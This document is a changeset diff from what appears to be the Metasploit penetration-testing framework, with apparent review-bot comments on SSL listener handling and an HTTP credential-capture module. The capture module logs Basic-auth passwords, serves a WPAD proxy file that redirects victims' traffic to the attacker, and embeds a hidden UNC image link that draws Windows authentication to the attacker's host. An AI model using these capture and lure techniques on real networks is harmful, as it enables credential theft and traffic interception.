Changeset 5452
- Timestamp:
- 03/22/08 01:34:52 (2 months ago)
- Files:
-
- framework3/trunk/external/ruby-lorcon/Makefile (deleted)
- framework3/trunk/lib/msf/core/exploit/tcp.rb (modified) (3 diffs)
- framework3/trunk/lib/rex/socket/ssl_tcp_server.rb (modified) (2 diffs)
- framework3/trunk/modules/auxiliary/server/capture/http.rb (modified) (4 diffs)
framework3/trunk/lib/msf/core/exploit/tcp.rb
r5051 r5452 252 252 register_options( 253 253 [ 254 Opt::SSL, 254 255 OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]), 255 OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]) 256 OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), 256 257 ], Msf::Exploit::Remote::TcpServer) 257 258 … … 310 311 'LocalHost' => srvhost, 311 312 'LocalPort' => srvport, 313 'SSL' => ssl, 312 314 'Context' => 313 315 { … … 391 393 392 394 # 395 # Returns the SSL option 396 # 397 def ssl 398 datastore['SSL'] 399 end 400 401 402 # 393 403 # Re-generates the payload, substituting the current RHOST and RPORT with 394 404 # the supplied client host and port from the socket. framework3/trunk/lib/rex/socket/ssl_tcp_server.rb
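Review bot: In lib/msf/core/exploit/tcp.rb the new `ssl` reader and the `'SSL' => ssl` listener parameter both take their value from the generic `datastore['SSL']` key, and the comment "Returns the SSL option" does not say which side of a connection it governs. If a module also mixes in a client-side part that reads the same key (not visible in these hunks), a single flag would switch SSL for the outbound connection and the listener together. I would document that on the reader, for example `# Returns the datastore['SSL'] setting; when set, the listener created by this mixin wraps accepted connections in SSL`. The enclosing class and the method holding the `'LocalHost'` hash start outside the hunks shown.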
r3616 r5452 26 26 def accept(opts = {}) 27 27 sock = super() 28 if (sock) 29 sock.extend(Rex::Socket::Tcp) 30 sock.context = self.context 31 pn = sock.getpeername 28 return nil if not sock 29 30 sock.extend(Rex::Socket::Tcp) 31 sock.context = self.context 32 pn = sock.getpeername 32 33 33 sock.peerhost = pn[1] 34 sock.peerport = pn[2] 35 end 36 t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx) 37 t.extend(Rex::Socket::Tcp) 38 t.accept 39 40 t 34 begin 35 t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx) 36 t.extend(Rex::Socket::Tcp) 37 t.peerhost = pn[1] 38 t.peerport = pn[2] 39 t.accept 40 t 41 rescue ::OpenSSL::SSL::SSLError 42 sock.close 43 nil 44 end 41 45 end 42 46 … … 66 70 cert.subject = subject 67 71 cert.issuer = issuer 68 cert.not_before = Time.now 69 cert.not_after = Time.now + 360072 cert.not_before = Time.now - 7200 73 cert.not_after = Time.now + 7200 70 74 cert.public_key = key.public_key 71 75 ef = OpenSSL::X509::ExtensionFactory.new(nil,cert) framework3/trunk/modules/auxiliary/server/capture/http.rb
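Review bot: In lib/rex/socket/ssl_tcp_server.rb the new `rescue ::OpenSSL::SSL::SSLError` in `accept` covers only TLS-level failures. A peer that resets the connection during `t.accept` can surface as a SystemCallError such as Errno::ECONNRESET, which would skip `sock.close` and propagate to whoever runs the accept loop. Widening the clause to `rescue ::OpenSSL::SSL::SSLError, ::SystemCallError` keeps the close-and-return-nil path for that case. `t.accept` is also a blocking handshake with no timeout visible here, so a client that connects and stays silent can hold up the caller unless the caller already bounds it. Separately, the certificate hunk sets `not_after` to two hours after generation, so a listener that runs longer would start presenting an expired certificate.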
r5451 r5452 54 54 55 55 def run 56 @myhost = datastore['SRVHOST'] 57 @myport = datastore['SRVPORT'] 56 58 exploit() 57 59 end … … 92 94 93 95 def dispatch_request(cli, req) 94 96 97 mysrc = Rex::Socket.source_address(cli.peerhost) 98 hhead = (req['Host'] || @myhost).split(':', 2)[0] 99 95 100 if(req['Authorization'] and req['Authorization'] =~ /basic/i) 96 101 basic,auth = req['Authorization'].split(/\s+/) … … 99 104 :host => cli.peerhost, 100 105 :proto => 'http', 101 :targ_host => req['Host'] || datastore['SRVHOST'],102 :targ_port => datastore['SRVPORT'],106 :targ_host => hhead, 107 :targ_port => @myport, 103 108 :user => user, 104 109 :pass => pass, 105 110 :extra => req.resource.to_s 106 111 ) 107 print_status("HTTP LOGIN #{ req['Host']}:#{datastore['SRVPORT']} #{user} / #{pass} => #{req.resource}")112 print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}") 108 113 end 109 114 110 115 if(req.resource =~ /^wpad.dat|.*\.pac$/i) 111 prx = "function FindProxyForURL(url, host) { return 'PROXY #{ Rex::Socket.source_address(cli.peerhost)}:#{datastore['SRVPORT']}'; }"116 prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }" 112 117 res = 113 118 "HTTP/1.1 200 OK\r\n" + 114 "Host: #{ req['Host'] || datastore['SRVHOST']}\r\n" +119 "Host: #{hhead}\r\n" + 115 120 "Content-Type: application/x-ns-proxy-autoconfig\r\n" + 116 121 "Content-Length: #{prx.length}\r\n" + … … 121 126 end 122 127 123 print_status("HTTP REQUEST #{ req['Host']}:#{datastore['SRVPORT']} #{req.resource}")128 print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource}") 124 129 125 data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{ Rex::Socket.source_address(cli.peerhost)}\\public\\loading.jpg' width='1' height='1'></body></html>"130 data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{mysrc}\\public\\loading.jpg' width='1' 
height='1'></body></html>" 126 131 res = 127 132 "HTTP/1.1 200 OK\r\n" +
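Review bot: In modules/auxiliary/server/capture/http.rb, `hhead = (req['Host'] || @myhost).split(':', 2)[0]` cuts at the first colon, so a bracketed IPv6 literal (for example `[::1]:8080`) is reduced to `[`, and an empty Host header yields nil because `''.split(':', 2)` returns an empty array. Stripping only a trailing port from the header keeps both cases intact: `hhead = req['Host'] ? req['Host'].to_s.sub(/:\d+\z/, '') : @myhost`. The value is client-supplied and is then written into the report, the console line and the `Host:` response header, so a short comment marking it as untrusted input would help the next reader. `dispatch_request` continues past the end of the last hunk.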
